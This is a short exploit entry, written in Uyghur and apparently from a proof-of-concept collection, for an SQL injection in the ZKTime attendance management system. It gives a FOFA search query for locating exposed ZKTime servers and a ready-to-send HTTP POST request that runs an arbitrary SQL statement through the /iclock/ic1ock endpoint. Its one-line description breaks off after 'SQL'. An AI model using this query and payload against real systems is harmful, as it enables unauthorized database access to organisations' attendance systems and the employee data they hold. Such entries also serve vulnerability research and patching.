Zktime Sql injection

2025-يىلى 9-ئاي 1-كۈنى

چۈشەندۈرىشى

Zktime باشقۇرۇش سىستېمىسىدا SQL

fofa-query

title="ZKTime" || body="/media/images/ZKECO16.ico" || (body="ZKTeco Security LLC" && body="/media/jslib/ba seISSob ject.js")

POC

    POST /iclock/ic1ock HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    
    submit=%E6%89%A7%E8%A1%8C+SQL+%E8%AF%AD%E5%8F%A5&sql=select+md5(521)